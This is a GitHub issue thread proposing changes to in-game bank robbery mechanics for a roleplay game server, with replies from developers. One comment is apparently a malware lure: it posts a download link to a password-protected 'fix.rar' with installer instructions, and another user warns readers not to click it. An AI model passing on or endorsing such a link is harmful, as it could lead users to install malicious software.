### ISSUE TITLE
Suggestion - Improve Bank Robberies

### ISSUE THREAD

**Issue by MetaHatter** [InZidiuZ/op-framework-issue-tracker#3530]
### Assurance

I have read the `README.md`

### Summary

- Add panel to the rear/side of all bank locations
- Use the Raspberry when next to the panel to check the status of the bank
	- Open/Closed
	- Funds (Low/Med/High)
- If the bank is open, the hacker can choose to convert a Chip in inventory to an "Encoded Chip"
- The Encoded Chip acts as a secure key for that one bank and "holds" that bank for 15 minutes before it breaks. (Other banks are closed for that 15 minutes)
- The vault door will now only accept the "Encoded Chip" for that bank within that 15 minutes. (all else works as current). 
- If bank is not hit, "Security codes shuffle" the chip becomes useless (breaks), and banks reopen for anyone.
- Number of hittable spots changes based on "Funds" to make scouting banks ahead of time "worth it".  

Existing item requirements: Chip, Raspberry
New Item: Encoded Chip

### Reason

This is to address multiple problems:
- People pre-emptively kidnapping to be the first to a bank.
- People camping a bank until the second it opens.
- People using only certain banks because convenient.
- People oddly running into the back of a bank.

The hold created by the "Encoded Chip" will reserve the bank for a group for a small window to enable them to get a hostage.  This will reduce the negative aspects of the RP for the hostages themselves, which are often newer players. No one wants to be stuck in a trunk for 15 minutes.

The next two will be addressed with the Raspberry hack.  The bank hacked may have low money for this cycle.  The robber will likely want to go find a better payout.  If high value is "worth it", they will have to keep hopping banks and try to find the "Good one". All before looking for a hostage.

The panel on the back/side of the bank will solve the final point of people running into the back of an open bank as well as to make the process of scoping out a bank being more visible for a tiny chance of PD noticing.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MetaHatter** [comment]
Do not click weird links from strangers.

**Comment by coalaura** [comment]
I don't really want to make bank robberies so much harder. They are balanced with risk and reward at the moment. Ben recently added completely new minigames which will replace the current ones for all kinds of robberies, etc.

> People pre-emptively kidnapping to be the first to a bank.
> People camping a bank until the second it opens.
> People using only certain banks because convenient.
> People oddly running into the back of a bank.

Most of these issues feel more like staff issues to me and player's inability to roleplay properly. However one idea i do think could work would be to have banks slowly "recover" after a robbery. So for example if bank xyz is robbed and then robbed again very quickly after it would have less of a payout since they have not gotten more money through transports yet. I think that could help with people only robbing certain banks without necessarily making it way more difficult. (I've implemented that now)

**Comment by coalaura** [comment]
Another thing could be the chance for a suspicious person call if someone unauthorized enters the room with the vault door, since any real bank would most likely stop you if you went back there.

**Comment by antihero6713** [comment]
> Another thing could be the chance for a suspicious person call if someone unauthorized enters the room with the vault door, since any real bank would most likely stop you if you went back there.

That is what I said or I can add a extra door in the mlo that you have to lock pick and that gives PD a call because lets be real no one is getting caught if they get a call. They are already gone by that time
